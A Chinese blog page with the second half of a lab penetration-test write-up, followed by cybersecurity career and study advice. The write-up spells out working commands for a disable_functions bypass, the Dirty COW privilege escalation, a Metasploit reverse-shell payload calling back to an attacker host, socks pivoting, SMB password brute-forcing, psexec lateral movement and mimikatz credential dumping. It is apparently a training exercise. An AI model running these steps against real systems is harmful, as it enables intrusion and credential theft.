返回目录:win7问题
内容导航:
一、记一次内网靶场实战(下篇)
(接上篇)绕过disable_functions
但是这里命令执行返回的是127,应该是disable_functions禁用了命令执行的函数,在windows下绕过disable_functions的方法虽然很少,但是在linux里面绕过disable_functions的方法却有很多,这里就不展开说了
这里为了方便我直接使用的是蚁剑里自带的插件绕过disable_functions,可以看到已经上传脚本操作成功了
这里我直接去连接上传的这个.antproxy.php,这里理论上是应该用原来的密码连接过去就可以执行命令了,但是这和地方不知道为什么返回数据为空我淦!
这里只好用最原始的方法,上传一个绕过disable_functions的py,通过传参的方式执行系统命令
测试一下传参为whoami,可以看到这里是一个低权限www-data
ifconfig看一下网卡情况,这里很奇怪,因为之前我们在扫描的时候这台CentOS的ip应该是192.168.1.0/24这个网段的,但是这里ifconfig出来却是192.168.53.0/24这个网段,当时说实话有点懵
arp -a查看下路由表,可以看到都是192.168.93.0/24这个网段
再看一下端口的进出,发现都是93这个网段
interfaces中配置的静态网卡也是93这个网段
Nginx反向代理
那么到这里已经很明显了,也就是说我们之前拿到的那台linux的192.168.1.0/24这个网段相当于一个公网IP,但是真正的主机应该是192.168.93.0/24,但这个是一个内网网段,所以说最符合这种情况的就是nginx反向代理
因为之前nginx反代的情况基本没遇到过,所以这里顺带补充一下自己的盲区
何为代理
在Java设计模式中,代理模式是这样定义的:给某个对象提供一个代理对象,并由代理对象控制原对象的引用。
可能大家不太明白这句话,在举一个现实生活中的例子:比如我们要买一间二手房,虽然我们可以自己去找房源,但是这太花费时间精力了,而且房屋质量检测以及房屋过户等一系列手续也都得我们去办,再说现在这个社会,等我们找到房源,说不定房子都已经涨价了,那么怎么办呢?最简单快捷的方法就是找二手房中介公司(为什么?别人那里房源多啊),于是我们就委托中介公司来给我找合适的房子,以及后续的质量检测过户等操作,我们只需要选好自己想要的房子,然后交钱就行了。
代理简单来说,就是如果我们想做什么,但又不想直接去做,那么这时候就找另外一个人帮我们去做。那么这个例子里面的中介公司就是给我们做代理服务的,我们委托中介公司帮我们找房子。
何为反向代理
反向代理和正向代理的区别就是:正向代理代理客户端,反向代理代理服务器。
反向代理,其实客户端对代理是无感知的,因为客户端不需要任何配置就可以访问,我们只需要将请求发送到反向代理服务器,由反向代理服务器去选择目标服务器获取数据后,在返回给客户端,此时反向代理服务器和目标服务器对外就是一个服务器,暴露的是代理服务器地址,隐藏了真实服务器IP地址。
反向代理的好处
那么为什么要用到反向代理呢,原因有以下几点:
1、保护了真实的web服务器,web服务器对外不可见,外网只能看到反向代理服务器,而反向代理服务器上并没有真实数据,因此,保证了web服务器的资源安全
2、反向代理为基础产生了动静资源分离以及负载均衡的方式,减轻web服务器的负担,加速了对网站访问速度(动静资源分离和负载均衡会以后说)
3、节约了有限的IP地址资源,企业内所有的网站共享一个在internet中注册的IP地址,这些服务器分配私有地址,采用虚拟主机的方式对外提供服务
了解了反向代理之后,我们再具体的去探究一下Nginx反向代理的实现
1、模拟n个http服务器作为目标主机用作测试,简单的使用2个tomcat实例模拟两台http服务器,分别将tomcat的端口改为8081和8082
2、配置IP域名
192.168.72.49 8081.max.com192.168.72.49 8082.max.com
3、配置nginx.conf
upstream tomcatserver1 { server 192.168.72.49:8081; }upstream tomcatserver2 { server 192.168.72.49:8082; }server { listen 80; server_name 8081.max.com; #charset koi8-r; #access_log logs/host.access.log main; location / { proxy_pass http://tomcatserver1; index index.html index.htm; } }server { listen 80; server_name 8082.max.com; #charset koi8-r; #access_log logs/host.access.log main; location / { proxy_pass http://tomcatserver2; index index.html index.htm; } }
流程: 1)浏览器访问8081.max.com,通过本地host文件域名解析,找到192.168.72.49服务器(安装nginx) 2)nginx反向代理接受客户机请求,找到server_name为8081.max.com的server节点,根据proxy_pass对应的http路径,将请求转发到upstream tomcatserver1上,即端口号为8081的tomcat服务器。
那么这里很明显还有一台linux主机在整个拓扑内做为内网Ubuntu的反向代理主机,这时候我翻缓存文件夹的时候发现了一个mysql文件夹,跟进去看看
发现了一个test.txt,不会又是管理员忘记删了的账号密码吧(手动狗头)
因为之前我们扫端口的时候发现开了22端口,那么这个账号密码很可能就是ssh的帐号密码
使用ssh连接尝试
连接成功到了另外一台linux主机
看一下主机和ip情况,可以发现这台主机已经不是我们之前的那台Ubuntu了,而是CentOS,而且双网卡,一张网卡是我们之前扫描时候得出的1.0/24这个网段的ip,还有一个ip就是93.0/24这个内网网段的ip,那么这台linux主机就是Ubuntu的反向代理主机无疑了
脏牛提权
这里直接选择linux提权首选的脏牛进行提权
gcc -pthread dirty.c -o dirty -lcrypt //编译dirty.c./dirty 123456 //创建一个高权限用户,密码为123456
可以看到这里已经执行成功,脏牛执行成功过后会自动生成一个名为firefart的高权限用户,密码就是我们刚才设置的123456
这里我们切换到firefart用户进行查看
内网渗透centos上线msf
这里因为是linux的原因,就不使用cs上线的打法了,先生成一个linux的payload上线到msf
use exploit/multi/script/web_deliveryset lhost 192.168.1.10set lport 4444set target 7run
运行之后会给出一个payload
use exploit/multi/script/web_deliveryset target 7 set payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.1.10set lport 4444exploit
将payload复制到centos执行
可以看到反弹session已经成功
socks代理进入内网扫描
这里使用添加路由、使用socks_proxy模块进入内网
route add 192.168.93.0 255.255.255.0 1route printuse auxiliary/server/socks_proxyset version 4arun
然后在/etc/proxychain.conf文件中添加代理的ip和端口,这里一定要和设置里的对应
这里可以使用proxychain + nmap进行扫描,这里为了方便我就直接使用msf中的模块对192.168.93.0/24这个网段进行扫描了。注意这里在实战的时候可以适当把线程调小一点,不然流量会很大,这里因为是靶场的原因我就直接调成了20
use auxiliary/scanner/discovery/udp_probeset rhosts 192.168.93.1-255set threads 20run
这里扫描完之后可以发现,内网里有3台主机存活,分别是192.168.93.10 192.168.93.20 192.168.93.30
但是这时候信息还不够,调用nmap继续扫描详细信息
nmap -T4 -sC -sV 192.168.93.10 192.168.93.20 192.168.93.30
首先是10这台主机,可以看到开放了88跟389这两个端口,熟悉的师傅都应该知道这两个端口大概率锁定了这台主机就是域控
20这台主机开的都是几个常规端口,值得注意的就是1433端口,意味着20这台主机上有mssql服务
30这台主机也是开了几个常规端口,跟前面两台主机相比就没什么特征端口,应该是一个普通的域成员主机
永恒之蓝尝试
这里我发现三台主机都开了139、445端口,那么先使用永恒之蓝模块先批量扫描一波看有没有可以直接用永恒之蓝打下来的主机
这里没有能够直接用永恒之蓝拿下的主机,win7跟2008匿名管道都没有开所以利用不了
密码枚举
因为这三台主机都开了445端口,可以使用smb,使用msf中的smb_login模块进行密码枚举尝试
use auxiliary/scanner/smb/smb_loginset rhosts 192.168.93.20set SMBUser Administratorset PASS_FILE /tmp/1W.txtrun
这里很幸运,跑出来的密码是123qwe!ASD刚好在我的1W.txt这个字典里面
psexec横向移动
这里使用proxifier将msf的socks代理到本地,忘记截图了orz...
这里既然已经拿到了administrator的密码,使用ipc先连接到20这一台主机,使用copy命令将mimikatz拷贝到20这台主机上
然后使用psexec获取一个cmd环境,使用mimikatz抓取hash并保存为日志
psexec64.exe 192.168.93.20 cmdmimiKatz.exe log privilege::debug sekurlsa::logonpasswords
type mimikatz.log读取日志内容可以发现域管的帐号密码为Administrator zxcASDqw123!!
那么这里也直接使用ipc连接直接连接10这台主机,即TEST这个域的域控,可以看到已经连接成功了
使用命令查看机密文件
dir 192.168.93.10C$usersAdministratorDocumentstype 192.168.93.10C$usersAdministratorDocumentsflag.txt
二、网络安全如何入门?
零基础、转专业、跨行等等都可以总结为,零基础或者有一点基础的想转网络安全方向该如何学习。
要成为一名黑客,实战是必要的。安全技术这一块儿的核心,说白了60%都是实战,是需要实际操作。
如果你选择自学,需要一个很强大的一个坚持毅力的,还有钻研能力,大部分人是东学一块西学一块儿,不成体系化的纸上谈兵的学习。许多人选择自学,但他们不知道学什么。
再来说说,先学编程还是渗透,
很多人说他们想学编程,但是在你学了编程之后。会发现离黑客越来越远了。。。
如果你是计算机专业的,之前也学过编程、网络等等,这些对于刚入门去学渗透就已经够了,你刚开始没必要学那么深,有一定了解之后再去学习。如果是转专业、零基础的可以看我下面的链接,跟着公开课去学习。
B站有相关零基础入门网络安全的视频
另外说一句,渗透是个立马可以见效的东西,满足了你的多巴胺,让你看到效果,你也更有动力去学。
举个栗子:你去打游戏,杀了敌人,是不是很舒服,有了反馈,满足了你的多巴胺。
编程这玩意,周期太长,太容易劝退了,说句不好听的,你学了三个月,可能又把之前学的给忘了。。。这又造成了死循环。所以想要学网安的可以先学渗透。在你体验了乐趣之后,你就可以学习编程语言了。这时,学习编程语言的效果会更好。因为你知道你能做什么,你应该写什么工具来提高你的效率!
先了解一些基本知识,协议、端口、数据库、脚本语言、服务器、中间件、操作系统等等,
接着是学习web安全,然后去靶场练习,再去注册src挖漏洞实战,
学习内网,接着学习PHP、python等、后面就学习代码审计了,
最后还可以往硬件、APP、逆向、开发去学习等等
(图片来自A1Pass)
网络安全学习实际上是个很漫长的过程,这时候你就可以先找工作,边工边学。
怎么样能先工作:
学完web安全,能够完成基本的渗透测试流程,比较容易找到工作。估计6到10k
内网学完估计10-15k
代码审计学完20-50k
红队表哥-薪资自己谈
再来说说如果你是对渗透感兴趣,想往安全方面走的,我这边给你一些学习建议。
不管想学什么,先看这个行业前景怎么样--
2017年我国网络安全人才缺口超70万,国内3000所高校仅120所开设相关专业,年培养1万-2万人,加上10
-
20家社会机构,全国每年相关人才输送量约为3万,距离70万缺口差距达95%,此外,2021年网络安全人才需求量直线增长,预计达到187万,届时,人才需求将飙升278%!
因为行业人才输送与人才缺口的比例问题,网络安全对从业者经验要求偏低,且多数对从业者学历不设限。越来越多的行业从业者上升到一定阶段便再难进步,很容易被新人取代,但网络安全与其他行业的可取代性不同,网络安全工程师将在未来几十年都处于紧缺状态,并且,对于防御黑客攻击,除了极少数人靠天分,经验才是保证网络安全的第一法则。
其次,不管是什么行业都好,引路人很重要,在你刚入门这个行业的时候,你需要向行业里最优秀的人看齐,并以他们为榜样,一步一步走上优秀。
不管是学习什么,学习方法很重要,当你去学习其他知识时候,
都可以根据我下面介绍的方法去学习:
四步学习法
一、学习
二、模仿
三、实战
四、反思
说在前头,不管是干什么,找到好的引路人很重要,一个好老师能让你少走很多弯路,然后迈开脚步往前冲就行。
第一步,找到相关资料去学习,你对这个都不了解,这是你之前没接触过的领域,不要想着一次就能听懂,当然天才除外(狗头滑稽),听完之后就会有一定的了解。
第二步,模仿,模仿什么,怎么模仿?先模仿老师的操作,刚开始可能不知道啥意思,模仿两遍就会懂一些了。
第三步,实战,怎么实战?先去我们配套的靶场上练习,确定靶场都差不多之后,再去申请成为白帽子,先去挖公益src,记住,没有授权的网站都是违法的。(师父领进门,判刑在个人)
第四部,反思,总结你所做的步骤,遇到的问题,都给记录下来,这个原理你理解了吗?还是只是还是在模仿的部分养成做笔记的习惯。
学习方式有了,接下来就是找到正确的引路人进行学习,一个好的引路人,一个完整的体系结构,能让你事半功倍。
三、web前端不掉头发的学习方法
不掉头发的前端(这可能吗哈哈)只要想学习哪里学习都是有效果的。但需要结合自身的一些特点来调整学习方向,这样学习起来会事半功倍,以下推荐3种学习线路,适用于不同的学习人群;
方法1:先学习编程,然后学习Web渗透及工具使用等
适用人群:有一定的代码基础的小伙伴
(1)基础部分
基础部分需要学习以下内容:
(1.1)计算机网络 :
重点学习OSI、TCP/IP模型,网络协议,网络设备工作原理等内容,其他内容快速通读;
【推荐书籍】《网络是怎样连接的_户根勤》一书,简明扼要,浅显易懂,初学者的福音;如果觉得不够专业,可以学习图灵设计丛书的《HTTP权威指南》;
(1.2)Linux系统及命令 :
由于目前市面上的Web服务器7成都是运行在Linux系统之上,如果要学习渗透Web系统,最起码还是要对linux系统非常熟悉,常见的操作命令需要学会;
学习建议:学习常见的10%左右的命令适用于90%的工作场景,和office软件一样,掌握最常用的10%的功能,基本日常使用没什么问题,遇到不会的,再去找相关资料;常见的linux命令也就50-60个,很多小白囫囵吞枣什么命令都学,这样其实根本记不住。
【推荐书籍】Linux Basics for Hackers;
(1.3)Web框架 :
熟悉web框架的内容,前端HTML,JS等脚本语言了解即可,后端PHP语言重点学习,切记不要按照开发的思路去学习语言,php最低要求会读懂代码即可,当然会写最好,但不是开发,但不是开发,但不是开发,重要的事情说三遍;
数据库:
需要学习SQL语法,利用常见的数据库MySQL学习对应的数据库语法,也是一样,SQL的一些些高级语法可以了解,如果没有时间完全不学也不影响后续学习,毕竟大家不是做数据库分析师,不需要学太深;
(2)Web安全
(2.1)Web渗透
掌握OWASP排名靠前的10余种常见的Web漏洞的原理、利用、防御等知识点,然后配以一定的靶场练习即可;有的小白可能会问,去哪里找资料,建议可以直接买一本较为权威的书籍,配合一些网上的免费视频系统学习,然后利用开源的靶场辅助练习即可;
【推荐书籍】白帽子讲Web安全(阿里白帽子黑客大神道哥作品)
【推荐靶场】常见的靶场都可以上github平台搜索,推荐以下靶场DVWA、bWAPP、upload-labs-master、SQL-lib-master、WebBug、pikachu等,有些是综合靶场,有些是专门针对某款漏洞的靶场;
(2.2)工具学习
Web渗透阶段还是需要掌握一些必要的工具,工具的学习b站上的视频比较多,挑选一些讲解得不错的视频看看,不要一个工具看很多视频,大多数视频是重复的,且很浪费时间;
主要要掌握的工具和平台:burp、AWVS、Appscan、Nessus、sqlmap、nmap、shodan、fofa、代理工具ssrs、hydra、medusa、airspoof等,以上工具的练习完全可以利用上面的开源靶场去练习,足够了;
练习差不多了,可以去SRC平台渗透真实的站点,看看是否有突破,如果涉及到需要绕过WAF的,需要针对绕WAF专门去学习,姿势也不是特别多,系统性学习学习,然后多总结经验,更上一层楼;
(2.2)自动化渗透
自动化渗透需要掌握一门语言,且需要熟练运用,可以是任何一门自己已经掌握得很熟悉的语言,都可以,如果没有一门掌握很好的,那我推荐学习python,最主要原因是学起来简单,模块也比较多,写一些脚本和工具非常方便;
虽说不懂自动化渗透不影响入门和就业,但是会影响职业的发展,学习python不需要掌握很多不需要的模块,也不需要开发成千上万行的代码,仅利用它编写一些工具和脚本,少则10几行代码,多则1-200行代码,一般代码量相对开发人员已经少得不能再少了,例如一个精简的域名爬虫代码核心代码就1-20行而已;
几天时间学习一下python的语法,有代码基础的,最快可能一天就可以学习完python的语法,因为语言都是相通的,但是学习语言最快的就是写代码,别无他法;接下来可以开始尝试写一些常见的工具,如爬虫、端口探测、数据包核心内容提取、内网活跃主机扫描等,此类代码网上一搜一大把;然后再写一些POC和EXP脚本,以靶场为练习即可;有的小伙伴可能又要问了,什么是POC和EXP,自己百度去,养成动手的好习惯啦;
(2.3)代码审计
此处内容要求代码能力比较高,因此如果代码能力较弱,可以先跳过此部分的学习,不影响渗透道路上的学习和发展。
如果希望在Web渗透上需要走得再远一些,需要精通一门后台开发语言,推荐php,因为后台采用php开发的网站占据最大,当然你还精通python、asp、java等语言,那恭喜你,你已经具备很好的基础了;
代码审计顾名思义,审计别人网站或者系统的源代码,通过审计源代码或者代码环境的方式去审计系统是否存在漏洞(属于白盒测试范畴)
那具体要怎么学习呢?学习的具体内容按照顺序列举如下 :
掌握php一些危险函数和安全配置;
熟悉代码审计的流程和方法;
掌握1-2个代码审计工具,如seay等;
掌握常见的功能审计法;(推荐审计一下AuditDemo,让你产生自信)
常见CMS框架审计(难度大); 代码审计有一本国外的书籍《代码审计:企业级Web代码安全架构》,当然有空的时候可以去翻翻,建议还是在b站上找一套系统介绍的课程去学习;github上找到AuditDemo,下载源码,搭建在本地虚拟机,然后利用工具和审计方法,审计AuditDemo中存在的10个漏洞,难度分布符合正态分布,可以挑战一下;
至于CMS框架审计,可以去一些CMS官方网站,下载一些历史存在漏洞的版本去审计,框架的学习利用官方网站的使用手册即可,如ThinkPHP3.2版本是存在一些漏洞,可以尝试读懂代码;但是切记不要一上来就看代码,因为CMS框架的代码量比较大,如果不系统先学习框架,基本属于看不懂状态;学习框架后能够具备写简单的POC,按照代码审计方法结合工具一起审计框架;其实也没没想象中的那么难,如果你是开发人员转行的,恭喜你,你已经具备代码审计的先天性优势。
可能有人会问:“我代码很差,不学习代码审计行不行?”其实代码审计不是学习网络安全的必要条件,能够掌握最好,掌握不了也不影响后续的学习和就业,但你需要选择一个阶段,练习得更专业精通一些,如web渗透或者内网渗透,再或者是自动化渗透;
(3)内网安全
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;
如果想就业面更宽一些,技术竞争更强一些,需要再学习内网渗透相关知识;
内网的知识难度稍微偏大一些,这个和目前市面上的学习资料还有靶场有一定的关系;内网主要学习的内容主要有:内网信息收集、域渗透、代理和转发技术、应用和系统提权、工具学习、免杀技术、APT等等;
可以购买《内网安全攻防:渗透测试实战指南》,这本书写得还不错,国内为数不多讲内网的书籍,以书籍目录为主线,然后配合工具和靶场去练习即可;
那去哪里可以下载到内网靶场?如果你能力够强,电脑配置高,可以自己利用虚拟机搭建内网环境,一般需要3台以上的虚拟机;你也可以到国外找一些内网靶场使用,有一些需要收费的靶场还可以;
(4)渗透拓展
渗透拓展部分,和具体工作岗位联系也比较紧密,尽量要求掌握,主要有日志分析、安全加固、应急响应、等保测评等内容;其中重点掌握前三部分,这块的资料网络上也不多,也没有多少成型的书籍资料,可通过行业相关的技术群或者行业分享的资料去学习即可,能学到这一步,基本上已经算入门成功,学习日志分析、安全加固、应急响应三部分的知识也相对较为容易。
方法2:先学习Web渗透及工具,然后再学习编程
适用人群:代码能力很弱,或者根本没有什么代码能力,其他基础也相对较差的小伙伴
基础需要打好,再学习Web渗透比如linux系统、计算机网络、一点点的Web框架、数据库还是需要提前掌握;
像php语言、自动化渗透和代码审计部分内容,可以放在最后,当学习完毕前面知识后,也相当入门后,再来学习语言,相对会容易一些;
【优先推荐】方法2,对于小白来说,代码基础通常较弱,很多很多小白会倒在前期学习语言上,所以推荐方法2的学习,先学习web渗透和工具,也比较有意思,容易保持一个高涨的学习动力和热情,具体学习内容我就不说了,请小伙伴们参照方法1即可。
方法3:选择一些适合自己的课程学习
适用人群:需要体系化学习、增强实战能力的小伙伴
具体根据自身条件来讲,如果你自学能力较差,那建议选择课程学习,网上各大平台等都有很多各式各样的课程,是可以更快帮助你迅速入门的,然后再根据自己自身所欠缺的方面,不断去完善和学习,最后达到你所要的优秀水平。
学习书籍推荐如下:
【基础阶段】
Linux Basics for Hackers(中文翻译稿)
Wireshark网络分析(完整扫描版)
精通正则表达式(中文第3版)
图解HTTP 彩色版
[密码学介绍].杨新.中文第二版
网络是怎样连接的_户根勤
[PHP与MySQL程序设计(第4版)].W.Jason.Gilmore
【web渗透阶段】
web安全攻防渗透测试实战指南
白帽子讲Web安全
Web安全深度
【自动化渗透阶段】
Python编程快速上手-让繁琐工作自动化
【代码审计阶段】
代码审计:企业级Web代码安全架构
【内网渗透阶段】
内网安全攻防:渗透测试实战指南
社会工程防范钓鱼欺诈